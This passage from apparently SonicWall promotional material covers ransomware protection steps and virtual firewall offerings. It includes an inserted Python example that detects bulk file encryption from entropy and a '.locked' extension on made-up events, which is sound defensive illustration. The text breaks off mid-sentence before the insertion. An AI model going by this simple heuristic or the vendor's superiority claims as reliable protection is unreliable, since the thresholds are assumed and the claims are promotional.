    Capture ATP also features Real-Time Deep Memory Inspection™ (RTDMI). RTDMI is a memory-based malware analysis engine that catches more malware, and faster, than behavior-based sandboxing methods. It also delivers a lower false-positive rate to improve security and the end-user experience.

  3. Email Security

    Filter email-borne attacks before they hit your network.
    Secure email solutions deliver comprehensive inbound and outbound protection from advanced cyberattacks, including ransomware, phishing, business email compromise (BEC), spoofing, spam and viruses. Proven solutions are available as on-premises email security appliances and as hosted secure email.

    SonicWall Email Security also integrates with Capture ATP to protect email from advanced threats, such as ransomware and zero-day malware.

  4. Advanced Endpoint Client Security

    Block ransomware before it compromises user devices.
    Traditional antivirus (AV) has been trusted for years to protect computers. This was a sound approach when the total number of signatures required numbered in the hundreds of thousands. Today, millions of new forms of malware are discovered each month.

    To protect endpoints from this endless onslaught of malware attacks, SonicWall recommends using a next-generation antivirus (NGAV) solution that can monitor the behavior of a system to look for malicious activities, such as the unauthorized encryption of your files.

    For example, SonicWall Capture Client delivers advanced malware protection and additional security capabilities for SonicWall firewall

Ransomware remains one of the most damaging cyberattacks to businesses. Follow these four ransomware protection best practices to help ensure ransomware does not impact your ability to operate.
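As an added illustration of the behavior-based check described in step 4 (this is example code, not SonicWall's or any product's implementation), the following detector scores constructed file-write events for the signature of unauthorized bulk encryption: high-entropy payloads written under a ransomware-style extension, several times within a short window. The event format, the `.locked` suffix and all thresholds are assumptions.

```python
import math
from collections import Counter

# Constructed sample of file-write events an endpoint agent might report:
# (timestamp_seconds, path, data_written). Not real telemetry.
SAMPLE_EVENTS = [
    (0.0, "/docs/report.docx", b"Quarterly report text, plain and readable. " * 4),
    (0.5, "/docs/budget.xlsx", b"Budget rows: 100, 200, 300, 400. " * 5),
    (1.0, "/docs/report.docx.locked", bytes(range(256)) * 2),
    (1.2, "/docs/budget.xlsx.locked", bytes(range(255, -1, -1)) * 2),
    (1.4, "/docs/memo.txt.locked", bytes((i * 37) % 256 for i in range(512))),
]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for ciphertext, well below for documents."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def detect_bulk_encryption(events, window_s=5.0, min_hits=3,
                           entropy_threshold=7.0, suspicious_suffix=".locked"):
    """Return (True, timestamp) once min_hits high-entropy writes carrying the
    suspicious suffix land within window_s seconds, else (False, None).
    Thresholds are assumptions; tune them against real endpoint telemetry."""
    hits = []
    for ts, path, data in events:
        if path.endswith(suspicious_suffix) and shannon_entropy(data) >= entropy_threshold:
            hits.append(ts)
            # keep only the hits that fall inside the sliding window
            hits = [h for h in hits if ts - h <= window_s]
            if len(hits) >= min_hits:
                return True, ts
    return False, None


if __name__ == "__main__":
    flagged, when = detect_bulk_encryption(SAMPLE_EVENTS)
    print("bulk encryption detected:", flagged, "at t =", when)
```

A production agent would feed this from a file-system event source and quarantine the writing process on a hit; entropy alone is not enough, since compressed archives are also high-entropy, which is why the extension change and rate are combined.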

4 Ways to Protect Your Virtualized Infrastructure

Adopting a virtualized infrastructure is well established as a cost- and space-savings model, but there are additional benefits as well. Whether you are using virtual servers deployed in the cloud or on-premises, there are proven best practices to help you maintain a sound security posture for the solutions that operate and protect virtual environments.

While physical appliances remain powerful workhorses, they sometimes require specific network traffic configurations to ensure they can properly protect and integrate with virtual environments.

Virtual firewalls, like the SonicWall NSv, are the No. 1 type of virtual appliance being deployed across environments. Securing an environment requires looking at all types of access and uses, such as remote access, communications and management.

SonicWall network security solutions operate and protect virtual environments in four categories:

  • Security: Network Security Virtual Firewall protects virtual environments at an intra-VLAN level.
  • Email: Email Security solution protects organizations against spam, viruses, phishing, ransomware and malware that enter through email. The solution can integrate seamlessly with Microsoft Office 365 and other on-premise and cloud email providers.
  • Remote Access: Secure Mobile Access provides anytime, anywhere access for any device to securely access an organization’s internal resources while the Web Application Firewall gives organizations the necessary controls around their forward-facing offerings.
  • Management: NSv deployments may be centrally managed using the on-premise SonicWall Global Management System (GMS) and the SonicWall Capture Security Center, an open, scalable cloud security management, monitoring, reporting and analytics software delivered as a cost-effective service offering. Capture Security Center gives the ultimate in visibility, agility and capacity to govern the entire SonicWall virtual and physical firewall ecosystem with greater clarity, precision, and speed — all from a single pane of glass.

SonicWall works diligently to ensure customers have access to best-in-class professional services delivered by Authorized Services Partners. These security solutions are optimized within virtual environments.

As Infrastructure as a Service (IaaS) offerings and cloud-based providers continue to grow, implementing trusted SonicWall platforms to protect, secure and manage your environment will allow you to grow and be more mobile through SonicWall’s virtualized product offerings.

Request a demo or trial of these products from your local partner or reach out to the Partner Enabled Services team to help you secure your virtualized environment through SonicWall Partner Enabled Services.